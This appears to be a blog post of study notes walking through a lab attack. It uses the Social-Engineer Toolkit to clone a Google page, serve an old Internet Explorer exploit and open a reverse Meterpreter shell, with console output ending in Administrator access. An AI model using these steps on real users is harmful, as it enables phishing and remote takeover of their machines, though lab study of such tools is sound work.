好记性不如铅笔头


Reading notes on 《魔鬼训练营》: generating an exploit web page with setoolkit

!!!These notes are for study and exchange only; do not use them for any other purpose!!!

setoolkit is a very useful social-engineering toolkit that bundles many tools; here the author only notes down its simplest usage.

Workflow for generating an exploit web page with setoolkit working together with Metasploit:

        Welcome to the Social-Engineer Toolkit (SET). 
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
。。。。。。。
set> 1 #option 1

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
。。。。。。。
set> 2 #option 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
。。。。。。
set:webattack>2 #option 2: generate an exploit web page that attacks the browser directly

   1) Web Templates
。。。。。。。
set:webattack>1 #for simplicity, use an existing template

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo

set:webattack> Select a template:2 #clone Google

 Enter the browser exploit you would like to use [8]:

。。。。。。。
  33) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
  34) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
  35) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
。。。。。。。

set:payloads>34 #use exploit number 34

   1) Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker
   2) Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker
。。。。。。。

set:payloads>2 #Meterpreter
set:payloads> Port to use for the reverse [443]:
。。。。。。。
[-] This may take a few to load MSF...
。。。。。。。
。。。。。。。
resource (/root/.set/meta_config)> exploit -j  #as shown, setoolkit starts Metasploit automatically and runs the exploit as a background job
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) > 
[*] Started reverse handler on 192.168.19.128:443 
[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.19.128:8080/
[*] Server started.

msf exploit(ms09_002_memory_corruption) > #when an IE browser visits the exploit page, the vulnerability is triggered
[-] 192.168.19.129   ms09_002_memory_corruption - Exception handling request: Connection reset by peer
[*] 192.168.19.129   ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
[*] 192.168.19.129   ms09_002_memory_corruption - Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption
[*] Sending stage (769024 bytes) to 192.168.19.129
[*] Meterpreter session 1 opened (192.168.19.128:443 -> 192.168.19.129:1226) at 2014-06-01 23:26:09 +0800
 #a session has been opened
[*] Session ID 1 (192.168.19.128:443 -> 192.168.19.129:1226) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (1364)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 572 #meterpreter was automatically migrated to another process
[+] Successfully migrated to process 

msf exploit(ms09_002_memory_corruption) > sessions #list sessions

Active sessions
===============

  Id  Type                   Information                                Connection
  --  ----                   -----------                                ----------
  1   meterpreter x86/win32  WINXP-PRO-VM\Administrator @ WINXP-PRO-VM  192.168.19.128:443 -> 192.168.19.129:1226 (192.168.19.129)

msf exploit(ms09_002_memory_corruption) > sessions -i 1 #interact
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP-PRO-VM\Administrator
